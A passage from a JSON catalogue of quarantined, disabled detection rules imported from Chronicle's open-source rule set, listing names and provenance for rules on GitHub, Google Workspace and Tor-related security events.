"detections/chronicle-imports/_quarantine/github-personal-access-token-created-from-tor-ip-address.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "github_personal_access_token_created_from_tor_ip_address", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/github/github_personal_access_token_created_from_tor_ip_address.yaral" } }, { "id": "chronicle-detection-rules-github-repository-archived-or-deleted", "type": "detection", "name": "github_repository_archived_or_deleted", "description": "github_repository_archived_or_deleted", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/github-repository-archived-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "github_repository_archived_or_deleted", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/github/github_repository_archived_or_deleted.yaral" } }, { "id": "chronicle-detection-rules-github-repository-branch-protection-rules-disabled", "type": "detection", "name": "github_repository_branch_protection_rules_disabled", "description": "github_repository_branch_protection_rules_disabled", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/github-repository-branch-protection-rules-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "github_repository_branch_protection_rules_disabled", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/github/github_repository_branch_protection_rules_disabled.yaral" } }, { "id": "chronicle-detection-rules-github-repository-deploy-key-created-or-modified", "type": "detection", "name": "github_repository_deploy_key_created_or_modified", "description": "github_repository_deploy_key_created_or_modified", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/github-repository-deploy-key-created-or-modified.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "github_repository_deploy_key_created_or_modified", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/github/github_repository_deploy_key_created_or_modified.yaral" } }, { "id": "chronicle-detection-rules-github-repository-visibility-changed-to-public", "type": "detection", "name": "github_repository_visibility_changed_to_public", "description": "github_repository_visibility_changed_to_public", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/github-repository-visibility-changed-to-public.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "github_repository_visibility_changed_to_public", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/github/github_repository_visibility_changed_to_public.yaral" } }, { "id": "chronicle-detection-rules-github-secret-scanning-alert", "type": "detection", "name": "github_secret_scanning_alert", "description": "github_secret_scanning_alert", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/github-secret-scanning-alert.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "github_secret_scanning_alert", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/github/github_secret_scanning_alert.yaral" } }, { "id": "chronicle-detection-rules-github-secret-scanning-disabled-or-bypassed", "type": "detection", "name": "github_secret_scanning_disabled_or_bypassed", "description": "github_secret_scanning_disabled_or_bypassed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/github-secret-scanning-disabled-or-bypassed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "github_secret_scanning_disabled_or_bypassed", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/github/github_secret_scanning_disabled_or_bypassed.yaral" } }, { "id": "chronicle-detection-rules-github-sso-configuration-modified", "type": "detection", "name": "github_sso_configuration_modified", "description": "github_sso_configuration_modified", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/github-sso-configuration-modified.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "github_sso_configuration_modified", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/github/github_sso_configuration_modified.yaral" } }, { "id": "chronicle-detection-rules-github-two-factor-authentication-requirement-disabled", "type": "detection", "name": "github_two_factor_authentication_requirement_disabled", "description": "github_two_factor_authentication_requirement_disabled", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/github-two-factor-authentication-requirement-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "github_two_factor_authentication_requirement_disabled", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/github/github_two_factor_authentication_requirement_disabled.yaral" } }, { "id": "chronicle-detection-rules-github-user-blocked-from-accessing-organization-repositories", "type": "detection", "name": "github_user_blocked_from_accessing_organization_repositories", "description": "github_user_blocked_from_accessing_organization_repositories", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/github-user-blocked-from-accessing-organization-repositories.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "github_user_blocked_from_accessing_organization_repositories", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/github/github_user_blocked_from_accessing_organization_repositories.yaral" } }, { "id": "chronicle-detection-rules-github-user-unblocked-from-accessing-organization-repositories", "type": "detection", "name": "github_user_unblocked_from_accessing_organization_repositories", "description": "github_user_unblocked_from_accessing_organization_repositories", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/github-user-unblocked-from-accessing-organization-repositories.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "github_user_unblocked_from_accessing_organization_repositories", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/github/github_user_unblocked_from_accessing_organization_repositories.yaral" } }, { "id": "chronicle-detection-rules-gmail-spike-in-undeliverables", "type": "detection", "name": "gmail_spike_in_undeliverables", "description": "gmail_spike_in_undeliverables", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/gmail-spike-in-undeliverables.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "gmail_spike_in_undeliverables", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/workspace/gmail_spike_in_undeliverables.yaral" } }, { "id": "chronicle-detection-rules-godlua-malware-detector-sysmon-behavior", "type": "detection", "name": "godlua_malware_detector_sysmon_behavior", "description": "godlua_malware_detector_sysmon_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/godlua-malware-detector-sysmon-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "godlua_malware_detector_sysmon_behavior", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/godlua_malware_detector__sysmon_behavior.yaral" } }, { "id": "chronicle-detection-rules-google-cloud-service-account-key-created-or-uploaded", "type": "detection", "name": "google_cloud_service_account_key_created_or_uploaded", "description": "google_cloud_service_account_key_created_or_uploaded", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/google-cloud-service-account-key-created-or-uploaded.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "google_cloud_service_account_key_created_or_uploaded", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/gcp/google_cloud_service_account_key_created_or_uploaded.yaral" } }, { "id": "chronicle-detection-rules-google-safebrowsing-file-contacts-tor-exit-node", "type": "detection", "name": "google_safebrowsing_file_contacts_tor_exit_node", "description": "google_safebrowsing_file_contacts_tor_exit_node", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/google-safebrowsing-file-contacts-tor-exit-node.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "google_safebrowsing_file_contacts_tor_exit_node", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/google_safebrowsing_file_contacts_tor_exit_node.yaral" } }, { "id": "chronicle-detection-rules-google-safebrowsing-file-process-creation", "type": "detection", "name": "google_safebrowsing_file_process_creation", "description": "google_safebrowsing_file_process_creation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/google-safebrowsing-file-process-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "google_safebrowsing_file_process_creation", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/google_safebrowsing_file_process_creation.yaral" } }, { "id": "chronicle-detection-rules-google-workspace-admin-role-assignment", "type": "detection", "name": "google_workspace_admin_role_assignment", "description": "google_workspace_admin_role_assignment", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/google-workspace-admin-role-assignment.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "google_workspace_admin_role_assignment", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/workspace/google_workspace_admin_role_assignment.yaral" } }, { "id": "chronicle-detection-rules-google-workspace-alerts-aggregated-by-severity", "type": "detection", "name": "google_workspace_alerts_aggregated_by_severity", "description": "google_workspace_alerts_aggregated_by_severity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/google-workspace-alerts-aggregated-by-severity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "google_workspace_alerts_aggregated_by_severity", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/workspace/google_workspace_alerts_aggregated_by_severity.yaral" } }, { "id": "chronicle-detection-rules-google-workspace-application-added", "type": "detection", "name": "google_workspace_application_added", "description": "google_workspace_application_added", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/google-workspace-application-added.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "google_workspace_application_added", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/workspace/google_workspace_application_added.yaral" } }, { "id": "chronicle-detection-rules-google-workspace-custom-admin-role-created", "type": "detection", "name": "google_workspace_custom_admin_role_created", "description": "google_workspace_custom_admin_role_created", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/google-workspace-custom-admin-role-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "google_workspace_custom_admin_role_created", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/workspace/google_workspace_custom_admin_role_created.yaral" } }, { "id": "chronicle-detection-rules-google-workspace-encryption-key-files-accessed-by-anonymous-user", "type": "detection", "name": "google_workspace_encryption_key_files_accessed_by_anonymous_user", "description": "google_workspace_encryption_key_files_accessed_by_anonymous_user", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/google-workspace-encryption-key-files-accessed-by-anonymous-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "google_workspace_encryption_key_files_accessed_by_anonymous_user", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/workspace/google_workspace_encryption_key_files_accessed_by_anonymous_user.yaral" } }, { "id": "chronicle-detection-rules-google-workspace-external-user-added-to-group", "type": "detection", "name": "google_workspace_external_user_added_to_group", "description": "google_workspace_external_user_added_to_group", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/google-workspace-external-user-added-to-group.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "google_workspace_external_user_added_to_group", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/workspace/google_workspace_external_user_added_to_group.yaral" } }, { "id": "chronicle-detection-rules-google-workspace-file-shared-from-google-drive-to-free-email-domain", "type": "detection", "name": "google_workspace_file_shared_from_google_drive_to_free_email_domain", "description": "google_workspace_file_shared_from_google_drive_to_free_email_domain", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/google-workspace-file-shared-from-google-drive-to-free-email-domain.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "google_workspace_file_shared_from_google_drive_to_free_email_domain", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/workspace/google_workspace_file_shared_from_google_drive_to_free_email_domain.yaral" } }, { "id": "chronicle-detection-rules-google-workspace-malicious-file-downloaded", "type": "detection", "name": "google_workspace_malicious_file_downloaded", "description": "google_workspace_malicious_file_downloaded", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/google-workspace-malicious-file-downloaded.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "google_workspace_malicious_file_downloaded", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/workspace/google_workspace_malicious_file_downloaded.yaral" } }, { "id": "chronicle-detection-rules-google-workspace-marketplace-allowlist-configuration", "type": "detection", "name": "google_workspace_marketplace_allowlist_configuration", "description": "google_workspace_marketplace_allowlist_configuration", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/google-workspace-marketplace-allowlist-configuration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "google_workspace_marketplace_allowlist_configuration", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/workspace/google_workspace_marketplace_allowlist_configuration.yaral" } }, { "id": "chronicle-detection-rules-google-workspace-mfa-disabled", "type": "detection", "name": "google_workspace_mfa_disabled", "description": "google_workspace_mfa_disabled", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/google-workspace-mfa-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "google_workspace_mfa_disabled", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/workspace/google_workspace_mfa_disabled.yaral" } }, { "id": "chronicle-detection-rules-google-workspace-multiple-files-copied-from-google-drive", "type": "detection", "name": "google_workspace_multiple_files_copied_from_google_drive", "description": "google_workspace_multiple_files_copied_from_google_drive", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/google-workspace-multiple-files-copied-from-google-drive.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "google_workspace_multiple_files_copied_from_google_drive", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/workspace/google_workspace_multiple_files_copied_from_google_drive.yaral" } }, { "id": "chronicle-detection-rules-google-workspace-multiple-files-deleted-from-google-drive", "type": "detection", "name": "google_workspace_multiple_files_deleted_from_google_drive", "description": "google_workspace_multiple_files_deleted_from_google_drive", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/google-workspace-multiple-files-deleted-from-google-drive.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "google_workspace_multiple_files_deleted_from_google_drive", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/workspace/google_workspace_multiple_files_deleted_from_google_drive.yaral" } }, { "id": "chronicle-detection-rules-google-workspace-multiple-files-downloaded-from-google-drive", "type": "detection", "name": "google_workspace_multiple_files_downloaded_from_google_drive", "description": "google_workspace_multiple_files_downloaded_from_google_drive", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/google-workspace-multiple-files-downloaded-from-google-drive.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "google_workspace_multiple_files_downloaded_from_google_drive", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/workspace/google_workspace_multiple_files_downloaded_from_google_drive.yaral" } }, { "id": "chronicle-detection-rules-google-workspace-multiple-files-sent-as-email-attachment-from-google-drive", "type": "detection", "name": "google_workspace_multiple_files_sent_as_email_attachment_from_google_drive", "description": "google_workspace_multiple_files_sent_as_email_attachment_from_google_drive", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/google-workspace-multiple-files-sent-as-email-attachment-from-google-drive.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "google_workspace_multiple_files_sent_as_email_attachment_from_google_drive", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/workspace/google_workspace_multiple_files_sent_as_email_attachment_from_google_drive.yaral" } }, { "id": "chronicle-detection-rules-google-workspace-new-trusted-domain-added", "type": "detection", "name": "google_workspace_new_trusted_domain_added", "description": "google_workspace_new_trusted_domain_added", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/google-workspace-new-trusted-domain-added.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "google_workspace_new_trusted_domain_added", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/workspace/google_workspace_new_trusted_domain_added.yaral" } }, { "id": "chronicle-detection-rules-google-workspace-ownership-transferred-on-google-drive", "type": "detection", "name": "google_workspace_ownership_transferred_on_google_drive", "description": "google_workspace_ownership_transferred_on_google_drive", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/google-workspace-ownership-transferred-on-google-drive.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "google_workspace_ownership_transferred_on_google_drive", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/workspace/google_workspace_ownership_transferred_on_google_drive.yaral" } }, { "id": "chronicle-detection-rules-google-workspace-password-policy-changed", "type": "detection", "name": "google_workspace_password_policy_changed", "description": "google_workspace_password_policy_changed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/google-workspace-password-policy-changed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "google_workspace_password_policy_changed", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/workspace/google_workspace_password_policy_changed.yaral" } }, { "id": "chronicle-detection-rules-google-workspace-saml-idp-configuration-change", "type": "detection", "name": "google_workspace_saml_idp_configuration_change", "description": "google_workspace_saml_idp_configuration_change", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/google-workspace-saml-idp-configuration-change.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "google_workspace_saml_idp_configuration_change", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/workspace/google_workspace_saml_idp_configuration_change.yaral" } }, { "id": "chronicle-detection-rules-google-workspace-suspicious-login-and-google-drive-file-download", "type": "detection", "name": "google_workspace_suspicious_login_and_google_drive_file_download", "description": 